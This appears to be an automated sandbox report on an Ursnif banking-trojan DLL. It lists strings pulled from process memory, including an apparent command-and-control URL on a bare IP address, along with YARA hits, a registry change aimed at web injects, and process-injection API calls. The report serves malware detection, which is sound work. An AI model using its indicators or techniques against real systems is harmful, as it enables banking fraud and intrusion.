Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 0000001E.00000002.704428444.000000000457B000.00000004.00000001.sdmp	String found in binary or memory: https://185.156.172.54/images/4bt_2F_2BiCS/_2BmnNrKQCK/z500RZDugibq5D/lzhEFX0aQWP4KyH_2Bwiq/KWi3Eifx
Source: explorer.exe, 0000001E.00000000.508762764.000000000E5A1000.00000004.00000040.sdmp	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: powershell.exe, 00000017.00000002.545875762.0000028A10065000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000017.00000002.545875762.0000028A10065000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000017.00000002.545875762.0000028A10065000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: RuntimeBroker.exe, 00000027.00000000.500013121.0000021912EF9000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: RuntimeBroker.exe, 00000027.00000000.500013121.0000021912EF9000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: explorer.exe, 0000001E.00000000.508762764.000000000E5A1000.00000004.00000040.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: RuntimeBroker.exe, 00000027.00000000.500013121.0000021912EF9000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: powershell.exe, 00000017.00000002.522033208.0000028A0020E000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000017.00000002.545875762.0000028A10065000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6SFRQ.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJwoCz.img?h=75&w=100
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14EN7h.img?h=368&w=6
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ardZ3.img?h=16&w=16
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bUhZr.img?h=368&w=6
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bV0ZF.img?h=166&w=3
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bVTlI.img?h=166&w=3
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bVl2Y.img?h=166&w=3
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bW83y.img?h=333&w=3
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bWhsC.img?h=333&w=3
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBK9Hzy.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBK9Ri5.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-8
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/o
Source: explorer.exe, 0000001E.00000000.499070200.0000000008430000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpMSN
Source: explorer.exe, 0000001E.00000000.499788442.0000000008552000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpZ
Source: RuntimeBroker.exe, 00000027.00000000.500013121.0000021912EF9000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy

Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000002.532393287.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346665065.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346762135.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346591933.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346712408.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.490922654.000001ED55336000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346417089.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.405016881.000000000572C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.696291358.0000021913236000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346784908.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346795149.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.465913433.0000000003160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346535972.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.705764448.0000000004E16000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.490298727.0000000000916000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5548, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4724, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6712, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4540, type: MEMORY

Creates a DirectInput object (often for capturing keystrokes)

Source: loaddll32.exe, 00000000.00000002.690656747.000000000084B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000002.532393287.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346665065.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346762135.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346591933.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346712408.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.490922654.000001ED55336000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346417089.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.405016881.000000000572C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.696291358.0000021913236000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346784908.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346795149.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.465913433.0000000003160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346535972.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.705764448.0000000004E16000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.490298727.0000000000916000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5548, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4724, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6712, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4540, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

PE file has a writeable .text section

Source: 5fd885c499439tar.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Writes or reads registry keys via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FA71B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_04FA71B9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FA79B3 NtMapViewOfSection,	1_2_04FA79B3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FA7B01 GetProcAddress,NtCreateSection,memset,	1_2_04FA7B01
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FAB2FD NtQueryVirtualMemory,	1_2_04FAB2FD
Source: C:\Windows\explorer.exe	Code function: 30_2_04DFF0C0 NtAllocateVirtualMemory,	30_2_04DFF0C0
Source: C:\Windows\explorer.exe	Code function: 30_2_04E010A0 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,	30_2_04E010A0
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF8800 NtQuerySystemInformation,	30_2_04DF8800
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF2DC4 NtQueryInformationProcess,	30_2_04DF2DC4
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF72AC NtWriteVirtualMemory,	30_2_04DF72AC
Source: C:\Windows\explorer.exe	Code function: 30_2_04E06A5C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	30_2_04E06A5C
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF8208 RtlAllocateHeap,NtQueryInformationProcess,	30_2_04DF8208
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF0BE8 NtReadVirtualMemory,	30_2_04DF0BE8
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE8790 NtCreateSection,	30_2_04DE8790
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF13A8 NtMapViewOfSection,	30_2_04DF13A8
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF23A4 NtQueryInformationProcess,	30_2_04DF23A4
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE2710 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	30_2_04DE2710
Source: C:\Windows\explorer.exe	Code function: 30_2_04E1A003 NtProtectVirtualMemory,NtProtectVirtualMemory,	30_2_04E1A003
Source: C:\Windows\System32\control.exe	Code function: 31_2_009010A0 NtQueryInformationToken,NtQueryInformationToken,NtClose,	31_2_009010A0
Source: C:\Windows\System32\control.exe	Code function: 31_2_008FF0C0 NtAllocateVirtualMemory,	31_2_008FF0C0
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F72AC NtWriteVirtualMemory,	31_2_008F72AC
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F8208 NtQueryInformationProcess,	31_2_008F8208
Source: C:\Windows\System32\control.exe	Code function: 31_2_00906A5C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	31_2_00906A5C
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E8790 NtCreateSection,	31_2_008E8790
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F13A8 NtMapViewOfSection,	31_2_008F13A8
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F23A4 NtQueryInformationProcess,	31_2_008F23A4
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F0BE8 NtReadVirtualMemory,	31_2_008F0BE8
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E2710 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	31_2_008E2710
Source: C:\Windows\System32\control.exe	Code function: 31_2_0091A003 NtProtectVirtualMemory,NtProtectVirtualMemory,	31_2_0091A003
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED553210A0 NtQueryInformationToken,NtQueryInformationToken,NtClose,	35_2_000001ED553210A0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED553123A4 NtQueryInformationProcess,	35_2_000001ED553123A4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5533A003 NtProtectVirtualMemory,NtProtectVirtualMemory,	35_2_000001ED5533A003

Detected potential crypto function

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FAB0DC	1_2_04FAB0DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FA5920	1_2_04FA5920
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEC0C0	30_2_04DEC0C0
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEF8AC	30_2_04DEF8AC
Source: C:\Windows\explorer.exe	Code function: 30_2_04E09494	30_2_04E09494
Source: C:\Windows\explorer.exe	Code function: 30_2_04DFA054	30_2_04DFA054
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF0C34	30_2_04DF0C34
Source: C:\Windows\explorer.exe	Code function: 30_2_04E00180	30_2_04E00180
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEBD6C	30_2_04DEBD6C
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEE2F0	30_2_04DEE2F0
Source: C:\Windows\explorer.exe	Code function: 30_2_04E06A5C	30_2_04E06A5C
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEF204	30_2_04DEF204
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE48E8	30_2_04DE48E8
